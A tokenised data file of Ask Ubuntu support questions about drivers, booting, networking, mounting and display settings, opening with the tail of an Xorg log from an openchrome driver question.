0 ) : supported detailed timing : [ 36.690 ] ( ii ) chrome ( 0 ) : clock : 108.0 mhz image size : 443 x 249 mm [ 36.690 ] ( ii ) chrome ( 0 ) : h_active : 1600 h_sync : 1624 h_sync_end 1704 h_blank_end 1800 h_border : 0 [ 36.690 ] ( ii ) chrome ( 0 ) : v_active : 900 v_sync : 901 v_sync_end 904 v_blanking : 1000 v_border : 0 [ 36.690 ] ( ii ) chrome ( 0 ) : ranges : v min : 50 v max : 76 hz , h min : 30 h max : 80 khz , pixclock max 165 mhz [ 36.690 ] ( ii ) chrome ( 0 ) : serial no : lny080034225 [ 36.690 ] ( ii ) chrome ( 0 ) : monitor name : acer s201hl [ 36.691 ] ( ii ) chrome ( 0 ) : edid ( in hex ) : [ 36.691 ] ( ii ) chrome ( 0 ) : 00ffffffffffff000472a50173fa1015 [ 36.691 ] ( ii ) chrome ( 0 ) : 33150103682c19782aee91a3544c9926 [ 36.691 ] ( ii ) chrome ( 0 ) : 0f5054bfee80714f81c08100a9c00101 [ 36.691 ] ( ii ) chrome ( 0 ) : 010101010101302a40c8608464301850 [ 36.691 ] ( ii ) chrome ( 0 ) : 1300bbf91000001e000000fd00324c1e [ 36.691 ] ( ii ) chrome ( 0 ) : 5010000a202020202020000000ff004c [ 36.691 ] ( ii ) chrome ( 0 ) : 4e593038303033343232350a000000fc [ 36.691 ] ( ii ) chrome ( 0 ) : 00416365722053323031484c0a200070 [ 36.691 ] ( -- ) chrome ( 0 ) : ddc pi2cbus1 detected a crt [ 36.691 ] ( ii ) chrome ( 0 ) : edid vendor `` acr '' , prod id 421 [ 36.691 ] ( ii ) chrome ( 0 ) : printing probed modes for output vga-1 [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 1600x900 '' x60.0 108.00 1600 1624 1704 1800 900 901 904 1000 +hsync +vsync ( 60.0 khz ep ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 1600x900 '' x60.0 119.00 1600 1696 1864 2128 900 901 904 932 -hsync +vsync ( 55.9 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 1280x800 '' x59.8 83.50 1280 1352 1480 1680 800 803 809 831 -hsync +vsync ( 49.7 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 1152x864 '' x75.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync ( 67.5 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 1280x720 '' x60.0 74.48 1280 1336 1472 1664 720 721 724 746 -hsync +vsync ( 44.8 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 1024x768 '' x75.0 78.75 1024 1040 1136 1312 768 769 772 800 +hsync +vsync ( 60.0 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 1024x768 '' x70.1 75.00 1024 1048 1184 1328 768 771 777 806 -hsync -vsync ( 56.5 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 832x624 '' x74.6 57.28 832 864 928 1152 624 625 628 667 -hsync -vsync ( 49.7 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 800x600 '' x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync ( 48.1 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 800x600 '' x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync ( 46.9 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 640x480 '' x75.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync ( 37.5 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 640x480 '' x72.8 31.50 640 664 704 832 480 489 492 520 -hsync -vsync ( 37.9 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 640x480 '' x66.7 30.24 640 704 768 864 480 483 486 525 -hsync -vsync ( 35.0 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 640x480 '' x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : modeline `` 720x400 '' x70.1 28.32 720 738 846 900 400 412 414 449 -hsync +vsync ( 31.5 khz e ) [ 36.691 ] ( ii ) chrome ( 0 ) : output vga-1 connected [ 36.691 ] ( ii ) chrome ( 0 ) : using exact sizes for initial modes [ 36.691 ] ( ii ) chrome ( 0 ) : output vga-1 using initial mode 1600x900 [ 36.692 ] ( ii ) chrome ( 0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 36.692 ] ( == ) chrome ( 0 ) : dpi set to ( 96 , 96 ) [ 36.692 ] ( ii ) loading sub module `` fb '' [ 36.692 ] ( ii ) loadmodule : `` fb '' [ 36.692 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 36.707 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 36.707 ] compiled for 1.14.5 , module version = 1.0.0 [ 36.707 ] abi class : x.org ansi c emulation , version 0.4 [ 36.707 ] ( ii ) loading sub module `` exa '' [ 36.707 ] ( ii ) loadmodule : `` exa '' [ 36.707 ] ( ii ) loading /usr/lib/xorg/modules/libexa.so [ 36.719 ] ( ii ) module exa : vendor= '' x.org foundation '' [ 36.719 ] compiled for 1.14.5 , module version = 2.6.0 [ 36.719 ] abi class : x.org video driver , version 14.1 [ 36.719 ] ( ii ) unloadmodule : `` vesa '' [ 36.719 ] ( ii ) unloading vesa [ 36.719 ] ( ii ) unloadmodule : `` modesetting '' [ 36.719 ] ( ii ) unloading modesetting [ 36.719 ] ( ii ) unloadmodule : `` fbdev '' [ 36.719 ] ( ii ) unloading fbdev [ 36.719 ] ( ii ) unloadsubmodule : `` fbdevhw '' [ 36.719 ] ( ii ) unloading fbdevhw [ 36.719 ] ( -- ) depth 24 pixmap format is 32 bpp [ 36.720 ] ( ii ) chrome ( 0 ) : viascreeninit [ 36.720 ] ( ii ) chrome ( 0 ) : frame buffer from ( 0,0 ) to ( 1600,10485 ) [ 36.720 ] ( ii ) chrome ( 0 ) : using 9585 lines for offscreen memory . [ 36.720 ] 5760000 bytes of linear memory allocated at 57e400 , handle 3080119136 [ 36.720 ] 262144 bytes of linear memory allocated at afc800 , handle 3080110640 [ 36.720 ] 32 bytes of linear memory allocated at b3c900 , handle 3080118992 [ 36.720 ] 32 bytes of linear memory allocated at b3c980 , handle 3080121432 [ 36.720 ] ( ii ) chrome ( 0 ) : - visuals set up [ 36.722 ] ( ii ) chrome ( 0 ) : - b & w [ 36.723 ] ( ii ) chrome ( 0 ) : [ exa ] disabling exa accelerated composite . [ 36.723 ] ( ** ) chrome ( 0 ) : option `` migrationheuristic '' `` greedy '' [ 36.723 ] ( ii ) exa ( 0 ) : offscreen pixmap area of 61348864 bytes [ 36.723 ] ( ii ) exa ( 0 ) : driver registered support for the following operations : [ 36.723 ] ( ii ) solid [ 36.723 ] ( ii ) copy [ 36.723 ] ( ii ) chrome ( 0 ) : [ exa ] enabled exa acceleration . note in particular the errors [ 36.521 ] ( ee ) open /dev/dri/card0 : no such file or directory ... [ 36.609 ] ( ee ) chrome ( 0 ) : [ drm ] failed to open drm device for pci:0000:01:00.0 : no such file or directory output of ls -l /dev/dri/ : can not access /dev/dri/ : no such file or directory here 's my xorg.conf : section `` device '' identifier `` configured video device '' driver `` openchrome '' endsection section `` monitor identifier `` configured monitor '' vendorname `` acer '' modelname `` s201hl '' horizsync 30.0 - 53.0 vertrefresh 50.0 - 60.0 endsection section `` module '' load `` dri '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' endsection
439579	i just installed ubuntu 12.04 & when it 's boots up it pop 's up a blank screen	this is my first time using ubuntu , i downloaded it to my hp desktop , installed fine with dvd , and when it restarted a black screen pops up saying this is low video mode i tried almost everything on youtube & google , i found out after a few hours , it 's my additional drives that are nvidia that are not activated , and when i tried to activate nvidia binary xorg driver , kernel module and vdpau library it responded with this window saying : systemerror : e : unable to correct problems , you have held broken packages from there i had to reinstall ubuntu a few times , and still no results . i 've been working on it for almost a day and now i do n't know what to do . please help me and explain simply for i have never used ubuntu or linux until now .
439580	ubuntu update removed spotiy , google chrome , dropbox and mullvad	yesterday i dowloaded an update to 12.04 lt and today i discovered it removed spotify , google chrome , dropbox and mullvad . any easy way to get them back ? i don`t want to spend more time on reinstalling , cause i mean i have spent enough time on ubuntu . if ubuntu want to be userfriend this should not be possible to happen .
439583	openvpn w/ network manager	this may be a shot in the dark . i 'm setting up a ubuntu 12.04 computer in an open area in which each user need their own username and password to access the network via vpn . this must be a very simple task . which is why i choose network manager . but network manager requires a username to be place in a text box and saved in editing vpn connection . is their a way to make it ask with saving the config for a username and password ?
439584	ubuntu 12.04 lts - getting dialup to work	i 'm an xp refugee who installed ubuntu 12.04.4 with wubi alongside xp on my dell pc . unfortunately my only access to the internet is by basic dialup connection with a local isp using a conexant hsf v92 56k rtad speakerphone pci modem . ( dsl is unavailable in my neighborhood since i am too far from the nearest dslam . ) it seems there is no way to set up and use my isp dialup connection using the available tools that i can find in 12.04 . i downloaded and installed ( i think ) wvdial 1.61-4 build 1 using my windows network dialup connection but that ended up leading nowhere . should i download another version of ubuntu ( or some other version of linux for that matter ) that explicitly supports a basic dialup connection for a newbie like me , or is there something else i can do with this current version . i ca n't help but feel i 'm very close to getting this thing to work . thanks in advance for any advice or direction you can provide . p.s . using wvdial i get the message : `` dependency is not satisfiable libuni conf 4.6 '' using pppconfig ( pon/poff ) i get `` the file /etc/ppp/peers/provider does not exist . please create it or us a command line argument to use another file in the /etc/ppp/peers directory . '' epilogue : problem solved ! i discovered precise puppy 5.7.1 retro , burned a cd and have n't looked back . it recognized my modem , setup was a breeze and i 'm windows-free for the first time in my computing life . although i have to boot from the cd each time i use it , i can save everything to my hard-drive - including e-mail - when i finish . opera is quicker than ie ever was , and the resolution is virtually the same . i am sincerely grateful to everyone in the linux community involved . keep up the good work .
439585	no internet on iphone when ubuntu pc connected at the same time	the problem is very weird and i could n't manage to find anything about it on the internet so it makes me think that maybe it is case specific . anyways , it goes as following : i have a hp pavilion g6 ( very poorly supported notebook in my opinion ) with the following adapter : 02:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) i have an iphone 4s . when my ubuntu pc is not connected to the wireless network that i have internet on the iphone is working just as it should . when using windows ( same pc , dual boot ) internet on the iphone is also working . but when i 'm using ubuntu internet on the phone is not working . the phone is connected to the network but no internet , sometimes it is not even connnected to the network and has hard time connecting . as soon as i disconnect my laptop from the network iphone works again . i 'm posting it here because i think this is ubuntu related ... hope someone comes up with an answer . cheers
439587	open remote terminal location from nemo in ubuntu 13.10	in nautilus it was possible to build up a ssh connection to a remote server via passphrase . then you could bookmark the address and go there really fast . this still works in nemo with ubuntu 13.10 . but then , with a right click and using the option `` open in a terminal '' the user could open a terminal that would show a prompt of the remote server . so you could start to work there right away . using nemo and not nautilus anymore in ubuntu 13.10 this does n't seem to work anymore . i found out that i could use a script : # ! /bin/sh gnome-terminal -- execute /usr/bin/ssh user @ myserver.net but i would prefer to get back the old behaviour . is that somehow possible ?
439588	how to install ubuntu without losing data in other drives ?	i have 3 drives c , d , e. i 've got windows 7 installed in the c drive . how do i install ubuntu without losing data in the d and e drives ?
439593	how do i fix ugly boot screen glitch in ubuntu 12.04	normally , the boot screen should says 'ubuntu ' with five orange dots below it , but in my pc , they suddenly turn into this : glitched boot screen image glitched boot screen 8 seconds video here is my hardware : intel core2quad q9550 his hd 4670 iceq asus p5q how can i fix this ?
439595	e : gpg error : http : //ppa.launchpad.net saucy inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? )	e : gpg error : http : //ppa.launchpad.net saucy inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) keep getting above error when updating.. please advise where is this network authentications occuring ..
439598	how is logging of automatic/schedules scans enabled for clam av ?	in this thread it is discussed how to log a scan by clamav . however , the suggestions are only for logging one-off scans triggered from command line . my situation is that i 'm working in a setting where we have to comply with certain rules set forth by credit card companies etc . where two of the requirements are that a ) we need to have scheduled , automatic av scanning enabled , and b ) we need to keep log files for at least one year . i 'm currently running clamav 0.97.8/18695 on ubuntu 13.10 ( upgraded all the way from 10.10 ) and the clamtk gui v5.05 i 've defined daily scan ( as well as daily update of signatures/av definitions ) , but i can not find any logs ( my first guess was under /var/log/ ) . also , i ca n't find any clamscan config file where to define such things as logging . does anyone have ideas on how to enable automatic logging , and is there a major difference in the installation/config depending on whether clamav was installed with or without the clamtk option ? ( i installed from synaptic by selecting clamtk and allowing apt to resolve dependencies/include what was needed , then i manually upgraded the gui later from http : //code.google.com/p/clamtk/ ) . also , if anybody can answer how the scheduled of clamtk is working , i 'd appreciate it very much ( i do realise it 's a separate question , really ) . grep'ing in /etc/cron./ does n't show any hits on 'clam ' , so i wonder if clamtk is using its own , custom scheduler or what is going on under the bonnet .
439600	why not all linux packages/software come in .deb format ?	a .deb package is very easy to install , just like .exe in windows , simply double click and install via usc . i wonder why some developers choose formats like .tar.gz ( it scares the hell out of me ) which is complicated to install . probably not all linux forks are compatible with .deb ; is it so ? why linux community does not set some standard for package management so that each and every software can be in .deb format ( i love this format because of its simpleness to install ) and ultimately end users will be benefited .
439603	ubuntu 12.04 and realtek rtl8723ae some networks work , some not	i have ubuntu 12.04 and msi ms-16gc with realtek 8723ae and here is my problem . it works with some networks every time ( eg . my home network ) but it worked with eq . network form my phone ( hotspot ) and network on my university but now does n't . i 've tried to do the thing from here but i have this make -c /lib/modules/3.8.0-35-generic/build m=/home/korek /rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-35-generic' cc [ m ] /home/korek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o in file included from /home/korek /rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:39:0 : /home/korek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/pci.h:245:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl_pci_probe’ /home/korek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘_rtl_init_mac80211’ : /home/korek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : error : ‘ieee80211_hw_beacon_filter’ undeclared ( first use in this function ) /home/korek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : note : each undeclared identifier is reported only once for each function it appears in /home/korek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘rtl_action_proc’ : /home/korek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:870:25 : error : ‘rx_flag_mactime_mpdu’ undeclared ( first use in this function ) /home/korek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘rtl_send_smps_action’ : /home/korek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:1432:16 : error : ‘struct < anonymous > ’ has no member named ‘sta’ make [ 2 ] : *** [ /home/korek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 /base.o ] error 1 make [ 1 ] : *** [ _module_/home/korek /rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-35-generic' make : *** [ all ] error 2 what i have to do to get it working every time ?
439604	how to modify wireless ath5k driver ?	i 'm using my wireless card with ath5k . everything works fine but i 'd like to modify this driver . i 've downloaded its source code to have an overview of files structure . let 's assume that i want to edit base.c file which is located ( in compat-wireless package ) in ath5k directory . after typing : find / -name base.c i ca n't find it in linux file system . where should i look for these files ?
439611	upgrade from 13.10 to 14.04	i 'm planning to upgrade to 14.04 . so what are the precautions i need to do . and is there a way to go back if things goes bad . i would appreciate if some one tells me a check list to follow to do this upgrade successfully
439613	automatically bring up socketcan network interfaces on boot ( can0 , ... )	i have a couple of machines that use socketcan for can interfaces . the hardware driver is loaded by modprobe pcan , and that module is currently magically configured to start itself on boot , which is working fine . but every time i reboot , i have to bring up the network interfaces manually , e.g . : sudo ip link set can0 up sudo ip link set can1 up sudo ip link set can2 up sudo ip link set can3 up what is the best way to bring up the canx interfaces on boot ( and also making sure that they do n't come up until the pcan module is loaded ) ?
439616	lamp 403 forbidden after 13.10 upgrade	after upgrading to ubuntu 13.10 from 13.04 , my localhost started throwing 403 errors . the default documentroot and directories are both equal to one another , and the permissions on the default folder ( and all sub-folders ) is 755 . after applying the fix suggested here i was able to regain access to localhost/phpymyadmin however i still ca n't get other files to work .
439617	edit /srv folder	how can i get access to edit the /srv folder and all of its contents on ubuntu 12 ? i need to edit some files for a server called airtime . i need read and write privileges in it . cameron
439618	mac efi bootloader does n't show ubuntu , and grub load automatically	right now when i start my computer grub loads , and then i can select if i want to start either os x or ubuntu , and if i start the computer holding down the alt-option key to load mac 's efi bootloader ubuntu does n't show up . and therein lies the problem , how can i set things up so when i start the computer it simply boot 's into os x , and when i load mac 's efi loader i can select to boot ubuntu , through grub ? i used to have it set up like this , i do n't remember what i did as it was a few years ago . might be a different way to set things up , if you catch the gist of my problem , i do n't use ubuntu a lot and it is rather cumbersome to load apple 's efi bootloader every time i want to start os x .
439619	ubuntu 13.10 does not boot	i tried to install ubuntu 13.10 on a toshiba satellite sa50-543 with intel centrino processor but the kernel does not recognize the machine . any solutions ? thanks alessio
439620	how to prevent my windows on the other hdd from being added to the boot menu when doing update-grub ?	it seems that when sometimes i do apt-get upgrade , update-grub is automatically invoked . my problem is that i have two hdds on my laptop/pc . ubuntu , as well as a 64-bit windows 8.1 , is installed on the first hdd , and a 32-bit windows 7 is installed on the second hdd . now i use bios provided boot menu to choose which to boot from . i want to make sure that the 32-bit windows 7 not be added to the grub boot-menu if someday i updates my ubuntu using apt-get upgrade .
439630	xubuntu netflix compositing issues ?	iâve got this error message while trying opening netflix on xubuntu , compositing is not available , please enable compositing support and relaunch netflix desktop . ive verified online their isnt any resources available out there for my problem , and there is nothing that had worked yet ... so any how-tos , or instructions to solve this problem will be appreciated . thnxs in advance ! ! ; )
439632	unable to install ubuntu in dell optiplex 960	i have a dell optiplex 960 . i can run ubuntu on the cd ( ubuntu 12.04.4 lts ) . i tried to install it , and it seems to work . however , when i boot up without the cd , it simply gets stuck on a black screen , with a few lines ... inte ( r ) matrix storage manager option rom v8.5.2.1002 ichi0r/do raid volumes : ( a few more lines ) ... status : normal physical disks : ( a few more lines ) press < ctrl-i > to enter configuration utility ... but ctrl-i does n't work either . i can still boot from the cd , if it is in there . i tried using grub or start-up fix . what am i doing wrong ?
439634	unable to mount ntfs hard drive partition `` the disk contains an unclean file system ''	i have dual booted ubuntu 13.10 and windows 8.1 in my laptop . earlier my window partition ( c drive ) and other ntfs partition was accessible from ubuntu . now its giving me this error and not mounting : error mounting /dev/sda3 at /media/waqar/120abdc90abdaa5d : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/waqar/120abdc90abdaa5d '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . c drive ( window partition ) is giving this error : error mounting /dev/sda2 at /media/waqar/bad4d962d4d92185 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/waqar/bad4d962d4d92185 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i have restarted my system , booted in windows and then again shut down the system properly but its continuously giving me the same error . any help ?
439637	unity dash does not shows any applications . searching applications for ever	i installed the day before a set of packages for gcc-4.8.2 compiled on my machine ubuntu 12.04 . after the installation of the 52 packages i got some broken dependencies with i386 libraries ( multi-arch ) i did not compile at that time as i had compiled the amd64 version . as soon as the update manager displayed the red icon ( broken packages ) i noticed that the unity dash was unable to show any applications . i shut down my pc for the night in that state . the following day i fixed all the i386 ( mulyi arch ) libraries . then the update manager was working again , but the unity dash is still unable to show any application ... i tried to purge and re-install unity-lens-files and unity-lens-applications then restarting the pc . that did n't change anything to the unity dash behavior . it looks like there is somewhere a bug or some configuration on which it relies is corrupted . everything else is working fine so far .
439639	migration from xp to ubuntu	i have an older dell inspiron . i have recently installed ubuntu 12.04 on it . the originally os is win xp and right now both os are running on the pc alongside each other , with xp as the default system . what i would like to do is to have ubuntu as the default os and eventually get rid of xp . i anyone out there can help , it would be very much appreciated . thanks in advance !
439640	export thunderbird messages to sqlite database	i have seen a lot of posts about how to backup e-mails from the .thunderbird directory , but the truth is that i find the format of the messages quite awful , and i was wondering if there was any tool to reformat all the messages of a given account into a nice and clean sqlite database ? if such a tool exists , it would also be great to backup the attachment separately and that they would be linked to the database entries .
439641	how do i install gnome 3.12 on saucy ( 13.10 )	after reading the following blog post and youtube video : gnome 3.12 debuts with polish , improvements galore | omg ! ubuntu ! top 12 features of gnome 3.12 | omg ! ubuntu ! gnome 3.12 released - see what`s new [ video , screenshots ] ~ web upd8 : ubuntu / linux blog introducing gnome 3.12 - youtube i kinda wan na try out gnome 3.12 . how do i install it on my saucy ( amd64 )
439659	64 bit 12.04 too much for 1 gb ram ?	new install ubuntu 12.04 64 bit is painfully slow and freezes on a dell 5150 desktop . it has dual core 2.8 ghz pentium 4 processors and 1 gb ram . usage is over 700mb with just the desktop running . i installed using wubi and used the 64 bit kernel by mistake . our other machine is flying with the 32 bit and has 2 gb ram . could the 64 bit be the reason for the freezing ? would upgrading the ram alone fix it ? how could a reinstall of the 32 bit be done - would wubi simply overwrite the previous installation ? alternatively am i barking up the wrong tree entirely . my technical knowledge is zero so please go easy - but i do love linux . wish i had found it years ago . graphics from pci devices in hardinfo good machine 32 bit . intel 82g33/31 memory 512kb 256mb ( 32bit prefetch ) 1mb ( 32bit non prefetch ) slow machine 64 bit amd/ati rv370 ( no memory entry ) 32 mb prefetch 64kb non prefetch
439661	install ubuntu server 12.04 from bootable usb error loading installer components from cd	i have the same issue listed in this question : usb drive install of ubuntu 12.04 server fails - ca n't find components from cd-rom my issue differs because i have attempted all of the suggestions in that thread . i have checked the md5 sum of my downloaded .iso , i used universal-usb-installer-1.9.4.3 to create my bootable usb . i get to the same point mentioned in the other question : [ ! ! ] load installer components from cd there was a problem reading data from the cd-rom . please make sure it is in the drive . if retrying does not work. , you should check the integrity of your cd-rom . failed to copy file from cd-rom . retry ? i have run the perl script here : http : //cirrus.ucsd.edu/~pierce/fix_ubuntu_usb/ to fix the truncated file names . it found problems with 4 files that it could not fix : ./pool/main/m/maas/python-maas-provisioningserver_1.2+bzr1373+dfsq-0ubuntu1~12.04.4_all.deb ./install/netboot/ubuntu-installer/i386/pxelinux.cfg/default ./install/netboot/pxelinux.0 ./install/netboot/pxelinux.cfg/default there is a file called python ... 0ubuntu1~12.04.1_all.deb and looking around online there appears to be one available called python ... 0ubuntu1~12.04.5_all.deb but i can not find anything about a python ... 0ubuntu1~12.04.4_all.deb when i run the check cd-rom integrity option , it comes back and says that same file is missing . when i add the .iso file to the root of the bootable usb and try to mount it by using alt + f2 : mkdir /cdrom mount -t vfat /dev/sdb1 /cdrom i get an error back saying : mounting /dev/sdb1 /cdrom failed : device or resource busy this computer does not have a cd drive so i am stuck with using a usb install . i do not have a linux computer available to create the image with . how can i install ubuntu server ? ? thanks for reading . edit i took a cd drive from another computer and jury-rigged it to this one for the install . works fine from a cd .
439663	i ca n't connect to internet : network manager is disabled	everything began when i was trying to use aircrack-ng suite on my ubuntu 12.04 . i found on aircrack-ng website ( http : //www.aircrack-ng.org/doku.php ? id=b43 ) that using a broadcom driver and a wl driver at the same time , it will choose the wl driver and aircrack-ng is incompatible with wl driver . i choosed to desactivate it through the modprobe blacklist set in : '/etc/modprobe.d/blacklist.conf ' adding the line blacklist wl ( where it was written b43xx before ) and it blacklisted it . here is the problem : after a reboot , impossible to connect to internet , i restored the blacklist file as it was before and rebooted . impossible to connect to internet neither . afortunately i have an usb tp-link anten , and could reactivate broadcom driver ( it was disabled too from additional drivers settings ) and when i rebooted again , the b43 driver was again desactivated and i should use my usb anten to connect to internet to download and install bcm driver again ... what a story . in fact it is installed but disabled . ( because of the wl driver disabled i guess ) what can i do to reactivate wl driver ? any idea ? i add descriptions of what could help : lspci | grep network 02:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) nm-tool networkmanager tool state : disconnected - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : atl1c state : unavailable default : no hw address : 1c:75:08:4c:2c:34 capabilities : carrier detect : yes wired properties carrier : off there it should appear eth1 which is the name of my wireless card ( yes it 's weird but that 's true ) lsmod module size used by wl 2906597 0 lib80211 14040 1 wl iwlwifi 362337 0 mac80211 436493 3 iwlwifi , ath9k_htc , b43 cfg80211 178877 6 wl , iwlwifi , ath9k_htc , ath , b43 , mac80211 networkmanager.state ***** [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true ***** networkmanager.conf ***** [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false dmesg | grep b43 [ 29.990559 ] b43-phy0 : broadcom 4313 wlan found ( core revision 24 ) [ 29.991461 ] b43-phy0 error : found unsupported phy ( analog 10 , type 8 , revision 1 ) [ 29.991489 ] b43 : probe of bcma0:0 failed with error -95 [ 3478.268637 ] b43-phy2 : broadcom 4313 wlan found ( core revision 24 ) [ 3478.268812 ] b43-phy2 error : found unsupported phy ( analog 10 , type 8 , revision 1 ) [ 3478.268837 ] b43 : probe of bcma0:0 failed with error -95 something else i could add to help ? thanks by advance edit : resolved it this way : sudo apt-get install linux-headers-generic sudo apt-get install -- reinstall bcmwl-kernel-source sudo modprobe -r b43 ssb wl sudo modprobe wl but i need to run the two last commands each time i will start my computer . how to create a script to run it at boot ? or where shall i add it ( a configuration file ? ) ?
439664	linux bash script to create folder and move files	hello i need to create folder based on a filename and in this folder create another one and then move file to this second folder example : cat.jpg create folder cat create folder picture move cat.jpg to picture all my .jpg files are in /root/desktop/my_pictures so it should look like this : example picture `` cat.jpg '' /root/desktop/my_pictures/cat/pictures/cat.jpg sorry if i 'm not precise but english is not my native language . best regards and thank you
439665	how can i make ngs tx-sight work in ubuntu 13.10 ?	i have the ngs tx-sight webcam for a long time and knowing ubuntu has a huge database for drivers i wonder if it will have the right driver for this , if not , how to make it work ? if not , nevermind thank you
439666	college blocks ubuntu repositories -- - how to install/upgrade ?	i have been trying to install some packages in a 12.04 ubuntu 64-bit system and failed . it might be that our college has blocked ubuntu repositories . is there any other way to install the packages ?
439668	installing dvorak keyboard in xubuntu 12.04.4 when trying the os from a cd	i have used ubuntu until my version is no longer supported . so looked at several versions and xubuntu seems the most intuitive to me . i want to try it for a while before loading it on my computer and may want to try the next lts version of xubuntu as it is suppose to be available in april . but i can not install the dvorak keyboard layout . i have found the settings manager , but there is no dvorak varient there to add . i have looked for answers on the internet , but have not found anything that works . i have tried using the terminal and entering sudo loadkeys dvorak and it says it loads . but the keyboard is still in the querty layout . so it is obvious that i have not a clue . my email address is dcasteratzoho.com the dcaster @ krl.org is a very old email address that is no longer valid , but i use it on google . it may cut down on the spam i get . dan
439672	start ubuntu with xrandr generated screen resolution	first of all , sorry for starting a new question . i could n't see the forest thrue all the trees anymore is what we would say here in holland . it started with this question where i did n't know how to switch to my optimal screen resolution . sylvain pineau helped me out with the solution to use the xrandr code in the terminal . that worked out , but i fail to make it go to that resolution ( 1440x900 ) when my computer start . even the redirection to this question did n't help me out . the fourth answer on that page did look similar to what i had done with the xrandr code . but when i have made the changes to lightdm.conf and want to save it , it says that it is a read only file wich i ca n't overwrite . does anybody know how to fix this ? thanks in advance for your help ! : : : edit : : : i used this answer , becouse it seemed the most simple solution . i just do n't understand the script wich is used in the terminal yet . but this answer below said that i needed to change the lightdm.conf i 've had a similar problem with my laptop as above , and i wanted to add something to the conversation . if you do n't care about the login resolution ( i do n't ) , but want the actual workspace to be the right resolution , you can add your monitor information to lightdm but not turn on full resolution until you login . i just added the following script for my monitor in a file : lighdmxrandr xrandr -- newmode `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync xrandr -- addmode vga1 1440x900_60.00 then i call it in /etc/lightdm/lightdm.conf display-setup-script=/usr/bin/lightdmxrandr once i login i can setup my monitor in displays and it works , even after i re-log ( used to give me a big ugly error ) .
